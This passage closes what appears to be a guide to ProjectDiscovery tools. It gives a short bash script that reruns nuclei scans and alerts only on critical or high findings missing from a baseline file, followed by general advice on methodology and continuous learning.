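For the Automate step, here is a minimal sketch that alerts only on nuclei findings not seen in earlier runs. targets.txt, the baseline file name, and the echo are placeholders you would swap for your own target list and notification channel:
#!/bin/bash
# Hypothetical sketch: surface only nuclei findings absent from prior runs.
BASELINE="findings_baseline.txt"
touch "$BASELINE"
nuclei -l targets.txt -severity critical,high -silent | sort -u > findings_current.txt
# Lines present now but missing from the baseline are treated as new
comm -13 <(sort -u "$BASELINE") findings_current.txt > findings_new.txt
if [ -s findings_new.txt ]; then
    echo "New findings detected:"   # replace with your alerting mechanism
    cat findings_new.txt
    cat findings_new.txt >> "$BASELINE"
fi
Run from cron or a CI scheduler, this keeps noise down by alerting only when new findings appear between runs.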
The security landscape evolves constantly, and ProjectDiscovery's toolkit evolves with it. This guide provides the foundation for mastering these tools, but continuous learning and adaptation are essential for staying ahead of emerging threats.
Remember: Tools are only as effective as the methodology behind them and the expertise of the person wielding them. Use this guide as a foundation, but always apply critical thinking and adapt approaches based on your specific context and objectives.